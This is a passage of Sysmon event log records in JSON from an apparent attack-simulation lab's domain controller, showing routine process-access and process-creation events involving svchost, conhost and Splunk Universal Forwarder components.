{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6042,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.380\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.380","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6043,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.380\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.380","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6044,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.380\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.380","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6045,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.380\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.380","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6046,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.380\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.380","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6047,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.380\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2129-5F25-0000-0010245C0900}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.380","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2129-5F25-0000-0010245C0900}","TargetProcessId":"1632","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6048,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.505\r\nSourceProcessGUID: {41C8662E-2129-5F25-0000-0010245C0900}\r\nSourceProcessId: 1632\r\nSourceThreadId: 4880\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.505","SourceProcessGUID":"{41C8662E-2129-5F25-0000-0010245C0900}","SourceProcessId":"1632","SourceThreadId":"4880","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6049,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.882\r\nProcessGuid: {41C8662E-2129-5F25-0000-0010FE5D0900}\r\nProcessId: 2996\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.882","ProcessGuid":"{41C8662E-2129-5F25-0000-0010FE5D0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6050,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.880\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2129-5F25-0000-0010FE5D0900}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 